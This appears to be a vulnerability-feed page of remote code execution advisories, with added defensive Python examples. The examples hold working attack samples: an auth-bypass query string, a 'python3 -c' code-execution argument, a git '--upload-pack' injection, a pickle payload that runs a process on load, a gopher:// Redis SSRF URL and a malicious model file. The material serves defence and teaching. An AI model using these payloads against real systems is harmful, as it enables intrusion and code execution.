Pre-authentication remote code execution affects FUXA, an open-source web-based SCADA/HMI platform, in versions >= 1.2.11 and < 1.3.1 (the advisory references build v1.3.0-2706). The flaw is a path-confusion authentication bypass: the login middleware performs a substring match against the full request URL (including the query string), so appending a benign-looking parameter such as ?x=/socket.io to any administrative request causes the server to treat it as a public WebSocket handshake and skip the secureEnabled and nodeRedAuthMode checks entirely. When Node-RED is enabled with command-capable nodes, this reaches the /nodered/* admin interface and yields code execution in the container context (advisory states 'as root'). The GitHub Security Advisory (GHSA-p69w-mmfv-xrfj) discloses the exact bypass payload, so publicly available exploit details exist; there is no CISA KEV listing and no public report of active exploitation at time of analysis.

RCE Code Injection
NVD GitHub
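The bypass described above comes down to where the "is this a public route?" test looks. The following is an added example (not FUXA's code) that puts the two checks side by side: one that substring-matches the raw URL, query string included, and one that matches only the parsed path with a segment boundary. The route list and the `/nodered/flows` admin route are assumptions for the demo.

```python
"""Path-confusion auth bypass: public-route check on the raw URL vs on the parsed path.
Added example, not FUXA's code; the route list below is an assumption."""
from urllib.parse import urlsplit

# Assumption: routes a FUXA-like server legitimately serves without a session.
PUBLIC_PREFIXES = ("/socket.io", "/login", "/api/project")


def is_public_vulnerable(url: str) -> bool:
    """Substring match over the whole URL: '?x=/socket.io' anywhere flips it to True."""
    return any(marker in url for marker in PUBLIC_PREFIXES)


def is_public_hardened(url: str) -> bool:
    """Prefix match on the path component only, with a segment boundary so that
    '/socket.iox' is not mistaken for '/socket.io'."""
    path = urlsplit(url).path  # query string and fragment are dropped here
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PREFIXES)


def authorize(url: str, has_valid_session: bool, is_public) -> bool:
    """Minimal auth middleware: public routes pass, everything else needs a session."""
    if is_public(url):
        return True
    return has_valid_session


if __name__ == "__main__":
    probe = "/nodered/flows?x=/socket.io"  # assumed admin route plus the advisory's payload
    print("vulnerable check lets it through:", authorize(probe, False, is_public_vulnerable))
    print("hardened check blocks it:       ", not authorize(probe, False, is_public_hardened))
```

The remaining caveat is that the path the auth check sees must be normalised exactly the way the router normalises it (percent-decoding, repeated slashes, dot segments); any mismatch between the two is another path-confusion opportunity, so the check belongs in the same place as routing, not in front of it.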
CVSS 7.0
HIGH PATCH This Week

Linked Data Signature forgery in Fedify (the @fedify/fedify ActivityPub server framework) before 2.2.3 lets remote unauthenticated attackers reshape a third-party-signed activity so it is interpreted differently while its signature still verifies. Because the signature covers the canonical RDF graph rather than the JSON-LD serialization, an attacker who has received a signed activity can use JSON-LD keywords (@graph, @reverse, @included) or context-alias tricks to promote, hide, or rewrite fields and have the forged result accepted as authentic. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but the GitHub Security Advisory documents the exact restructuring techniques in detail.

RCE Canonical
NVD GitHub
CVSS 8.6
HIGH PATCH This Week

Arbitrary package installation leading to code execution affects the yeoman-environment npm library (the runtime behind the Yeoman/`yo` scaffolding CLI) in versions >= 2.9.0 and < 6.0.1. The vulnerable `installLocalGenerators()` method silently calls `repository.install()` on caller-supplied package names without any user confirmation, so a downstream CLI that passes attacker-controlled project configuration into this path will install and execute attacker-chosen packages during bootstrap. There is no public exploit identified at time of analysis and the issue is not on CISA KEV; CVSS is 8.6 (high) but exploitation is contingent on how consumers feed configuration into the library.

RCE
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Remote code execution in Lumiverse AI chat application prior to 0.9.7 allows any authenticated user to run arbitrary OS-level commands on the server by abusing the MCP server creation endpoint. Although the endpoint allowlists binary names (node, bun, python3, deno), it forwards user-controlled args unfiltered to the child process, and every allowed binary supports inline code execution flags (-e or -c). No public exploit identified at time of analysis, but the CVSS 9.9 rating reflects the trivial exploit path and the fact that the server binds on all interfaces with a bypassable host-header rebinding check.

RCE
NVD GitHub
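The Lumiverse entry above is a good illustration of why an allowlist of interpreter names is not a policy on what gets executed. The added example below (not Lumiverse's code) contrasts the name-only check with one that also imposes a positional contract on the arguments: the first argument must be a script inside a vetted directory and may never be an interpreter option. The allowed-binary set is the advisory's; `ALLOWED_SCRIPT_ROOT` and the extension set are assumptions.

```python
"""Why allowlisting interpreter names does not constrain an MCP server launch command.
Added example, not Lumiverse's code; ALLOWED_SCRIPT_ROOT and ALLOWED_EXTENSIONS are assumptions."""
import os

ALLOWED_BINARIES = {"node", "bun", "python3", "deno"}   # the advisory's allowlist
ALLOWED_SCRIPT_ROOT = "/opt/mcp-servers"                # assumption: where vetted servers live
ALLOWED_EXTENSIONS = {".js", ".mjs", ".ts", ".py"}      # assumption


def vulnerable_is_allowed(command: str, args: list) -> bool:
    """Only the binary name is checked; args reach the child untouched, so
    'python3 -c ...' or 'node -e ...' is still arbitrary code."""
    return os.path.basename(command) in ALLOWED_BINARIES


def hardened_is_allowed(command: str, args: list) -> bool:
    """Binary allowlist plus a positional contract: args[0] must be a vetted script
    path, never an interpreter option, and it must stay inside ALLOWED_SCRIPT_ROOT."""
    if os.path.basename(command) not in ALLOWED_BINARIES:
        return False
    if not args or args[0].startswith("-"):
        # Interpreter options (-c, -e, --eval, -m, --require, -p, ...) are only honoured
        # before the script argument, so refusing any dash-led first argument removes them all.
        return False
    script = os.path.normpath(args[0])
    if not os.path.isabs(script):
        return False
    if os.path.commonpath([ALLOWED_SCRIPT_ROOT, script]) != ALLOWED_SCRIPT_ROOT:
        return False  # '..' traversal or a sibling directory with a matching prefix
    if os.path.splitext(script)[1] not in ALLOWED_EXTENSIONS:
        return False
    # Everything after the script is passed to the script, not to the interpreter.
    return True


if __name__ == "__main__":
    evil = ("python3", ["-c", "import os; os.system('id')"])
    print("vulnerable:", vulnerable_is_allowed(*evil), "hardened:", hardened_is_allowed(*evil))
```

Even this is only a partial fix: interpreters such as deno take permission flags before the script, and a script directory the client can write to (or a `.pth`/`NODE_OPTIONS`-style environment the client can influence) reopens the hole. The robust shape is a server-side registry of fixed launch commands selected by name, with no interpreter arguments accepted from the client at all.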
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in FastNetMon Community Edition through 1.2.9 stems from an off-by-one heap write in the pervasively-used dynamic_binary_buffer_t class, reachable by anyone who can send NetFlow, sFlow, IPFIX, or BGP traffic to the DDoS-detection appliance. Because the flawed buffer is exercised during BGP encoding/decoding, NetFlow template parsing, and Flow Spec NLRI construction, an unauthenticated network attacker can corrupt adjacent heap metadata and potentially execute arbitrary code. The flaw carries a critical CVSS 9.8 (AV:N/AC:L/PR:N/UI:N), but no public exploit is identified at time of analysis and it is not listed in CISA KEV.

RCE Buffer Overflow Memory Corruption +1
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH This Week

NitroSense 3.x before 3.01.3052 contains a local privilege escalation (LPE) vulnerability. The program exposes a Windows named pipe that uses a custom protocol to invoke internal functions, and the pipe is misconfigured, allowing any authenticated local user to execute arbitrary code and delete arbitrary files with NT AUTHORITY\SYSTEM privileges.

Privilege Escalation RCE Path Traversal +1
NVD
EPSS 0% CVSS 8.5
HIGH This Week

Argument injection in Prefect 3.6.18's GitHub integration allows authenticated users to inject arbitrary options into git commands through the unsanitized reference field. The GitHubRepository block concatenates user input directly into the git clone command line, so a reference that git parses as an option rather than a branch name can lead to SSRF, credential theft, or remote code execution. While no active exploitation is confirmed, the straightforward attack vector and high impact make this a priority for organizations using Prefect's GitHub integration features.

RCE SSRF Gitlab
NVD
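For the Prefect entry above, the fix has two halves: never build the command as a string a shell will split, and never let the reference reach git in a position where it can be parsed as an option. The added example below is not Prefect's code: `is_valid_ref` is a conservative subset of the rules `git check-ref-format` enforces, and `clone_command` is an assumed argv builder that puts `--` between options and positional arguments.

```python
"""Handing an untrusted git reference to `git clone` without letting it become an option.
Added example, not Prefect's code; `is_valid_ref` is a conservative subset of
`git check-ref-format`, and `clone_command` is an assumed argv builder."""
import re

# Bytes git refuses in ref names: ASCII control chars, space, DEL, and ~ ^ : ? * [ \
_FORBIDDEN = re.compile(r"[\x00-\x20\x7f~^:?*\[\\]")


def is_valid_ref(ref: str) -> bool:
    """True only for names that cannot be mistaken for options or traverse anywhere."""
    if not ref or len(ref) > 255:
        return False
    if ref.startswith("-"):          # '--upload-pack=...' style option smuggling
        return False
    if _FORBIDDEN.search(ref):       # the space also kills '; curl ... | sh' payloads
        return False
    if ".." in ref or "@{" in ref or ref == "@":
        return False
    if ref.startswith("/") or ref.endswith("/") or "//" in ref:
        return False
    for component in ref.split("/"):
        if not component or component.startswith(".") or component.endswith(".lock"):
            return False
    return ref[-1] != "."


def vulnerable_clone_command(url: str, ref: str, dest: str) -> str:
    """The concatenation pattern the advisory describes; a shell parses the result."""
    return f"git clone --branch {ref} {url} {dest}"


def clone_command(url: str, ref: str, dest: str) -> list:
    """argv list for subprocess.run(..., shell=False): validated ref, options first,
    then '--' so that neither url nor dest can be parsed as an option either."""
    if not is_valid_ref(ref):
        raise ValueError(f"refusing unsafe git reference: {ref!r}")
    if url.startswith("-") or dest.startswith("-"):
        raise ValueError("repository URL and destination must not look like options")
    return ["git", "clone", "--depth", "1", "--branch", ref, "--", url, dest]


if __name__ == "__main__":
    print(vulnerable_clone_command("https://github.com/org/repo", "--upload-pack=/tmp/evil", "wd"))
    print(clone_command("https://github.com/org/repo", "feature/login-fix", "wd"))
```

The validator matters even with the argv form: git's own option parser is what decides whether `--upload-pack=...` (which runs an arbitrary command) or `-c` (which sets configuration such as `core.sshCommand`) is an option or a value, and that decision depends on argument position. Rejecting anything that could be read as an option removes the dependency on that parsing.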
EPSS 0% CVSS 2.1
LOW POC Monitor

Remote code injection in vps-inventory-monitoring allows authenticated attackers to execute arbitrary PHP code through the VpsTest console command. The vulnerability exists in the eval() function within VpsTest.php, exploitable by manipulating the 'vf' parameter with low attack complexity. Publicly available exploit code exists (GitHub POC published), and the maintainer has not responded to early disclosure attempts. CVSS 6.3 reflects moderate impact across confidentiality, integrity, and availability, with EPSS data unavailable but risk elevated by confirmed POC and unresponsive vendor.

PHP RCE Code Injection
NVD VulDB GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Arbitrary code execution in Docker Desktop's Model Runner on macOS allows any container on the Docker network to escape to the host by serving a malicious model whose config.json points model_file at a Python file. The MLX inference backend uses MLX-LM's importlib-based loader with no trust_remote_code gate and no sandbox, so a pull-and-infer request to model-runner.docker.internal executes attacker code as the Docker Desktop user. No public exploit identified at time of analysis and KEV status is not indicated.

RCE Python Docker +2
NVD
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Arbitrary code execution in Docker Model Runner's vllm-metal inference backend on macOS allows any container on the Docker network to execute Python code on the host as the Docker Desktop user. The vllm-metal backend hardcodes trust_remote_code=True when loading tokenizers and runs unsandboxed, so any model pulled from an OCI registry can ship attacker-controlled Python that executes when inference is requested via the model-runner.docker.internal API. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

RCE Python Docker +2
NVD
EPSS 0% CVSS 9.3
CRITICAL Monitor

An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file's path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O.

RCE Pcmanfm Qt
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Arbitrary code execution in Amazon Braket Python SDK versions prior to 1.117.0 allows an authenticated attacker with S3 write access to the job output bucket to compromise any client machine that processes those job results. The flaw stems from insecure pickle deserialization in the job results processing component, and while no public exploit has been identified at time of analysis, the impact extends to every downstream consumer of poisoned results. EPSS data is unavailable, but the supply-chain-style propagation across analyst workstations and CI systems materially raises real-world risk.

RCE Deserialization Amazon Braket Python Sdk
NVD GitHub
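"Insecure pickle deserialization", as in the Braket entry above, means that whoever writes the results file chooses a callable that runs on the consumer's machine. The added example below (not the Braket SDK's code) builds such a payload, shows `pickle.loads` executing it, and contrasts that with a restricted unpickler whose `find_class` only resolves an allowlist of plain builtins. The payload, the sample result document and the allowlist are constructed for the demonstration.

```python
"""What a poisoned pickle does to its consumer, and a restricted loader that refuses it.
Added example, not the Braket SDK's code; payload, sample document and allowlist are constructed."""
import builtins
import io
import pickle
import subprocess
import sys


class PoisonedResult:
    """Pickle serialises *instructions* for rebuilding an object. __reduce__ lets the
    producer name any importable callable plus arguments; the consumer runs it on load."""

    def __reduce__(self):
        # Stand-in for os.system / a reverse shell: spawns a process from a data file.
        return (subprocess.check_output, ([sys.executable, "-c", "print('pwned by pickle')"],))


def craft_payload() -> bytes:
    """What an attacker with write access to the output bucket would upload."""
    return pickle.dumps(PoisonedResult())


def serialize_benign() -> bytes:
    """A legitimate-looking job result (constructed sample)."""
    return pickle.dumps({"measurement_counts": {"00": 512, "11": 488}, "shots": 1000})


def default_loads(data: bytes):
    """The vulnerable path: pickle.loads honours every GLOBAL/REDUCE opcode in the stream."""
    return pickle.loads(data)


# Assumption: the only globals a results document may reference (containers and scalars).
SAFE_GLOBALS = {("builtins", n) for n in (
    "dict", "list", "tuple", "set", "frozenset", "str", "bytes", "int", "float", "bool", "complex")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def load_results(data: bytes):
    """Hardened path: anything outside SAFE_GLOBALS aborts before it can run."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        raise ValueError(f"untrusted pickle rejected: {exc}") from exc


if __name__ == "__main__":
    print("pickle.loads returned:", default_loads(craft_payload()))
    try:
        load_results(craft_payload())
    except ValueError as e:
        print("restricted loader:", e)
```

The restricted unpickler is the stopgap the Python documentation itself describes; the real fix for results files is a format with no code-loading semantics at all (JSON, or a schema-validated binary format), which is what the page's "supply-chain-style propagation" argument points at: every consumer of the bucket inherits whichever loader is weakest.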
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in Ivanti Secure Access Client versions prior to 22.8R6 allows unauthenticated attackers to run arbitrary code on endpoints by exploiting improper TLS certificate validation, contingent on user interaction (UI:R). No public exploit identified at time of analysis, but the CVSS 8.8 rating and Ivanti's own advisory disclosure mark this as a high-priority client-side risk for organizations using the VPN client.

RCE Ivanti Secure Access Client
NVD
EPSS 0% CVSS 7.5
PATCH Monitor

The fix for CVE-2025-48913 (Apache CXF: untrusted JMS configuration can lead to RCE) was not complete: another code path may still lead to code execution if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue.

RCE Apache Apache Cxf
NVD VulDB
EPSS 0% CVSS 9.3
PATCH Awaiting Data

A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The flaw stems from improper input sanitization in the component options window, which is rendered by an embedded Internet Explorer 11 browser; once a crafted file is opened, injected script can execute arbitrary system commands and read local files with no further user interaction.

XSS RCE Information Disclosure +2
NVD
EPSS 0% CVSS 7.3
Awaiting Data

Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality.

RCE Buffer Overflow N A
NVD GitHub
EPSS 0% CVSS 7.3
Awaiting Data

An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components.

RCE N A
NVD
EPSS 0% CVSS 6.5
Awaiting Data

Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter.

RCE Path Traversal N A
NVD GitHub
CVSS 7.6
HIGH PATCH This Week

Unauthenticated cross-origin MCP tool invocation in Network-AI v5.4.4 allows a remote attacker to lure a victim to a malicious web page that silently invokes any of the 22 exposed MCP tools (including config_set, agent_spawn, blackboard_write, and token_create/revoke) against the victim's locally running MCP SSE server. The vulnerability stems from an empty default secret combined with a wildcard CORS policy, and publicly available exploit code exists in the GHSA advisory demonstrating end-to-end exploitation. No CISA KEV listing yet and EPSS data was not provided, but the published PoC and trivial attack mechanics make this a meaningful risk for any user running the default Docker deployment.

RCE Python Docker
NVD GitHub
CVSS 9.6
CRITICAL PATCH Act Now

Arbitrary file write on the host in the Boxlite sandbox service before 0.9.0 allows attackers to escape the OCI image extraction root via crafted symlink entries in layer tarballs, enabling remote code execution on the host (typically as root). Exploitation requires a user to pull and load a malicious OCI image distributed through a registry such as Docker Hub. Publicly available exploit code exists (vendor-published PoC); the issue is not listed in CISA KEV at time of analysis.

RCE Python Path Traversal
NVD GitHub
CVSS 10.0
CRITICAL PATCH Act Now

Sandbox escape in Boxlite versions prior to 0.9.0 lets untrusted code running inside the lightweight VM remount host-shared virtiofs directories from read-only to read-write, enabling arbitrary writes to host files that operators believed were protected. Because the container is granted all 41 Linux capabilities (including CAP_SYS_ADMIN), a trivial 'mount -o remount,rw' bypasses the client-side MS_RDONLY enforcement, and in AI-agent deployments this leads to host code execution by tampering with mounted code, virtualenvs, or credentials. Publicly available exploit code exists (working PoC published in the GHSA advisory) and the issue carries a CVSS 10.0 with scope change; it is not listed in CISA KEV at time of analysis.

Authentication Bypass RCE Python +2
NVD GitHub
HIGH PATCH This Week

Arbitrary PHP code execution in Twig templating engine versions 3.15.0 through 3.25.x allows attackers who control template source to inject raw PHP into the compiled template via the `_self.(<string>)` dynamic-attribute macro-reference path, fully bypassing the SandboxExtension. The flaw executes injected code at template-load time, before any SecurityPolicy check runs, rendering even a globally-enabled empty allowlist sandbox ineffective. No public exploit identified at time of analysis, but the vendor advisory describes the bypass mechanism in enough detail that PoC development is straightforward.

PHP RCE Code Injection
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Unauthenticated arbitrary file upload in the BookingPress Pro WordPress plugin (versions ≤5.6) enables remote code execution by abusing missing file type validation in the bookingpress_validate_submitted_booking_form_func function. Exploitation requires the booking form to include a signature custom field, but otherwise needs no authentication or user interaction. No public exploit identified at time of analysis, though Wordfence's disclosure and the CWE-434 pattern make weaponization straightforward.

WordPress RCE File Upload +1
NVD VulDB
MEDIUM PATCH This Month

Sandbox escape in Twig 3.9.0-3.25.x allows any attacker with template authoring access to fully bypass `SourcePolicyInterface`-driven security policies, enabling OS command execution via `|map("system")` and secret disclosure via `constant()`. The bypass occurs because `Environment::createTemplate()` compiles inline strings under a synthesized name (`__string_template__<hash>`) that name/path-based `SourcePolicy` implementations do not recognize, causing `checkSecurity()` to silently become a no-op on the inner template. No public exploit has been identified at time of analysis, though the vendor advisory provides sufficient technical detail for reproduction, and the potential impact for affected configurations is critical.

RCE
NVD GitHub
CRITICAL PATCH Act Now

{% use %}` tags to break out of compiled cache file string literals and execute arbitrary PHP code. The flaw bypasses the Twig sandbox entirely because `SecurityPolicy` unconditionally permits `{% use %}` regardless of `allowedTags` configuration. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-7p85-w9px-jpjp) discloses the full exploitation primitive.

PHP RCE Code Injection
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

Remote code execution in Concrete CMS 9.5.0 and earlier is achievable through a CSRF flaw in the /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID> endpoint, which fails to validate anti-CSRF tokens. An attacker who controls a marketplace package matching an item ID already installed on the victim site can overwrite package PHP files and trigger the upgrade() method via a single navigation by a privileged admin, resulting in code execution as the web server user. No public exploit identified at time of analysis, though the vendor (Concrete CMS security team) has acknowledged the issue and assigned it a CVSS v4.0 score of 7.5.

PHP RCE CSRF
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce an authenticated administrator with canInstallPackages permission into installing an attacker-controlled package, resulting in remote code execution as the web server user. The flaw resides in the install_package() method of the dashboard's extend/install.php controller, which lacks CSRF token validation. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

PHP RCE CSRF
NVD
CVSS 7.5
HIGH PATCH This Week

Denial-of-service via unchecked memory allocation in russh (Rust SSH library) versions <= 0.60.2 allows local SSH agent peers to trigger uncontrolled buffer growth by sending oversized frame length values, and in pre-0.58.0 releases the same CryptoVec allocation path was reachable from remote SSH transport and zlib decompression buffers. The flaw stems from CryptoVec performing unchecked capacity growth, unchecked length arithmetic, and unsafe allocation/locking calls including NonNull::new_unchecked on potentially failed allocations, which can abort the process under memory pressure. Publicly available exploit code exists in the form of researcher-supplied PoC tests demonstrating both rejection on patched code and crash behavior on historical versions; no active exploitation has been identified at time of analysis and the issue is not listed in CISA KEV.

RCE Denial Of Service SSH
NVD GitHub
MEDIUM PATCH This Month

Arbitrary command execution in Fission's builder component (pkg:go/github.com/fission/fission <= 1.22.0) allows any principal with create or update privileges on Environment CRDs to redirect the builder pod to execute any binary reachable via $PATH inside the builder image. The vulnerable call site at pkg/builder/builder.go:254 passes the unsanitized Environment.spec.builder.command value directly to exec.Command after a strings.Fields split, enabling attackers to specify paths such as /bin/sh -c '...' as the build command. No public exploit has been identified at time of analysis, but the patch is confirmed released in v1.23.0 and the exploit primitive requires only a single Kubernetes API write to trigger.

RCE Command Injection
NVD GitHub
EPSS 0% CVSS 8.9
HIGH This Week

Remote code execution in Concrete CMS versions 5.0 through 9.5.0 allows a high-privileged administrator to bypass the platform's `_fromCIF` deserialization guard by submitting malicious payloads through the REST API instead of standard form POST requests. The flaw resides in the ExpressEntryList block controller (CWE-502) and stores a serialized PHP gadget in the `filterFields` database column, which is unmarshalled when another administrator subsequently views or edits the block, leading to full server takeover. No public exploit identified at time of analysis, and the issue is not present in CISA KEV.

PHP RCE Deserialization
NVD VulDB
EPSS 0% CVSS 9.4
CRITICAL Act Now

Authenticated remote code execution in Concrete CMS 9.5.0 and earlier allows an administrator with composer form editing privileges to chain a path traversal flaw in the ptComposerFormLayoutSetControlCustomTemplate field with the platform's permissive file uploader to execute arbitrary PHP on the server. The vendor scored this 9.4 (CVSS v4.0), reflecting high confidentiality, integrity, and availability impact on both the vulnerable system and subsequent systems. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

PHP RCE Path Traversal +1
NVD VulDB
CVSS 7.8
HIGH This Week

Unsafe default code execution in InternLM LMDeploy (<=0.12.3) lets a malicious Hugging Face model repository run arbitrary Python on the host whenever a user loads it through any LMDeploy CLI (serve, calibrate, gptq, awq). The library hardcodes transformers.AutoConfig.from_pretrained(..., trust_remote_code=True) in get_model_arch and related helpers with no flag, env var, or warning to opt out, overriding HF Transformers' default-secure stance. No public exploit identified at time of analysis, and exploitation requires the user to load an untrusted repo, so risk is hardening-level rather than network-reachable RCE.

RCE Python Code Injection
NVD GitHub
LOW PATCH Monitor

Two-layer blind SSRF in Crawlee for Python (pip/crawlee >= 1.0.0, < 1.7.0) allows an attacker who controls a sitemap or robots.txt file to force the crawler to issue HTTP requests against internal network services (layer 1, all HTTP clients), and - when CurlImpersonateHttpClient is configured - to dispatch non-HTTP scheme requests including gopher://, file://, dict://, and ftp:// (layer 2). The layer 2 escalation enables canonical Redis exploitation via gopher://, making RCE on unauthenticated internal Redis instances achievable from a public-facing crawler. No public exploit code has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog, but the researcher-credited advisory details a fully articulated attack path including Redis RCE.

RCE Python SSRF +2
NVD GitHub
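The Crawlee entry above has two distinct gates missing: a scheme allowlist (the layer-2 escalation to gopher://, file://, dict://) and a destination check on what a hostname actually resolves to (the layer-1 blind SSRF). The added example below is not Crawlee's code; it is a fetch gate a crawler would run on every sitemap or robots.txt URL before handing it to the HTTP client. The resolver is injectable so the demo runs offline against a constructed DNS table.

```python
"""Fetch gate for crawler-discovered URLs: scheme allowlist plus resolved-address checks.
Added example, not Crawlee's code; the resolver is injectable for offline use."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolve(host: str) -> list:
    """Real resolver: every A/AAAA answer, because the client may connect to any of them."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    mapped = getattr(addr, "ipv4_mapped", None)  # ::ffff:127.0.0.1 must count as loopback
    if mapped is not None:
        addr = mapped
    # is_global excludes private, loopback, link-local (169.254.169.254), shared,
    # reserved and unspecified ranges; multicast is excluded explicitly.
    return addr.is_global and not addr.is_multicast


def check_fetch_url(url: str, resolve=default_resolve):
    """Returns (allowed, reason). Rejects on scheme, then credentials in the URL,
    then on any resolved address that is not globally routable."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        ipaddress.ip_address(host)
        addresses = [host]  # literal address, nothing to resolve
    except ValueError:
        try:
            addresses = resolve(host)
        except (OSError, KeyError):
            return False, f"cannot resolve {host}"
    for ip in addresses:
        if not is_public_address(ip):
            return False, f"{host} resolves to non-public {ip}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("gopher://127.0.0.1:6379/_FLUSHALL", "http://169.254.169.254/latest/meta-data/",
                      "https://example.com/sitemap.xml"):
        print(candidate, "->", check_fetch_url(candidate))
```

Two things the gate cannot do on its own: redirects must be re-checked at every hop, and the connection should be pinned to the address that was checked, otherwise a rebinding resolver answers differently when the client connects. Clients built on libcurl also need the protocol set restricted at the client itself (libcurl's protocol-restriction options), since a URL that slipped past the gate would otherwise still reach curl's gopher and dict handlers.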
CVSS 7.8
HIGH PATCH This Week

Arbitrary code execution in InternLM lmdeploy <= 0.12.3 occurs because trust_remote_code=True is hardcoded across HuggingFace model-loading call sites in lmdeploy/archs.py and lmdeploy/utils.py. An attacker who can influence the model_path passed to an lmdeploy serving process can point it at a malicious HuggingFace repository, causing Transformers to download and execute attacker-controlled Python code with the privileges of the serving daemon. Publicly available exploit code exists in the GHSA advisory, and an upstream fix has been merged via PR #4511 (fixed in 0.13.0).

RCE Denial Of Service Python +2
NVD GitHub
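The two LMDeploy entries above and the Docker Model Runner vllm-metal entry share a root cause: the loader decides `trust_remote_code` for the operator instead of deciding it from what the checkpoint contains. The added example below (not LMDeploy's or Docker Model Runner's code) inspects a model directory statically, using the Transformers convention that custom-code checkpoints declare an `auto_map` in config.json and ship the referenced `.py` modules, and only returns `True` for a commit-pinned repo the operator has reviewed. The allowlist entry and the sample directories are constructed.

```python
"""Deciding trust_remote_code from checkpoint contents rather than hardcoding it.
Added example, not LMDeploy's or Docker Model Runner's code; allowlist and samples are constructed."""
import json
import os
import tempfile

# Assumption: (repo_id, commit) pairs whose custom code has been reviewed. Pin commits,
# not branches, because a repository can change after review.
ALLOWED_REMOTE_CODE = {
    ("example-org/reviewed-custom-model", "0123456789abcdef0123456789abcdef01234567"),
}


def inspect_model_dir(path: str) -> dict:
    """Static look at a checkpoint: does loading it require importing repo code?
    Nothing here imports or executes anything from the directory."""
    with open(os.path.join(path, "config.json"), encoding="utf-8") as fh:
        config = json.load(fh)
    auto_map = config.get("auto_map") or {}  # Transformers' custom-code declaration
    python_files = sorted(f for f in os.listdir(path) if f.endswith(".py"))
    return {
        "model_type": config.get("model_type"),
        "auto_map": auto_map,
        "python_files": python_files,
        "needs_remote_code": bool(auto_map) or bool(python_files),
    }


def decide_trust(path: str, repo_id=None, revision=None, operator_opt_in=False):
    """Returns (allowed, trust_remote_code, reason). The flag to pass to the loader is
    False unless the checkpoint needs custom code AND the operator opted in AND the
    (repo, commit) pair is on the reviewed allowlist."""
    info = inspect_model_dir(path)
    if not info["needs_remote_code"]:
        return True, False, "no custom code declared; load with trust_remote_code=False"
    if not operator_opt_in:
        return False, False, (f"refusing: {info['model_type']} checkpoint needs remote code "
                              f"{sorted(info['auto_map'])} and the operator did not opt in")
    if (repo_id, revision) in ALLOWED_REMOTE_CODE:
        return True, True, "custom code from a reviewed, commit-pinned repo"
    return False, False, "refusing: operator opted in but repo/commit is not on the reviewed allowlist"


def make_sample_model_dir(with_custom_code: bool) -> str:
    """Constructed checkpoint: minimal config.json, plus a modelling file if requested."""
    d = tempfile.mkdtemp(prefix="hf-checkpoint-")
    config = {"model_type": "llama", "hidden_size": 16}
    if with_custom_code:
        config["auto_map"] = {"AutoConfig": "configuration_x.XConfig",
                              "AutoModelForCausalLM": "modeling_x.XModel"}
        with open(os.path.join(d, "modeling_x.py"), "w", encoding="utf-8") as fh:
            fh.write("import os\nos.system('id')  # import-time side effect under trust_remote_code=True\n")
    with open(os.path.join(d, "config.json"), "w", encoding="utf-8") as fh:
        json.dump(config, fh)
    return d


if __name__ == "__main__":
    print(decide_trust(make_sample_model_dir(False)))
    print(decide_trust(make_sample_model_dir(True)))
```

With `trust_remote_code=False`, Transformers refuses a checkpoint that declares `auto_map`, which is the default-secure behaviour the entries say was overridden; the point of the inspection step is to surface that refusal as an operator decision instead of a loader constant, and to tie any opt-in to a specific commit rather than to a repository name an attacker can republish under.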
MEDIUM PATCH This Month

Path traversal in Mobile Verification Toolkit (MVT) pip/mvt versions through 2026.4.28 allows an adversary who delivers a crafted iOS backup to trigger arbitrary file writes or reads on the analyst's filesystem by embedding directory traversal sequences in fileID values within the backup's Manifest.db SQLite database. The decrypt-backup command can write attacker-controlled content to arbitrary writable paths - enabling shell profile modification or SSH key injection for code execution - while check-backup can read arbitrary host files into MVT's JSON and CSV forensic output. No public exploit has been identified at time of analysis; vendor-released patch v2026.5.12 is available.

RCE Path Traversal Apple
NVD GitHub
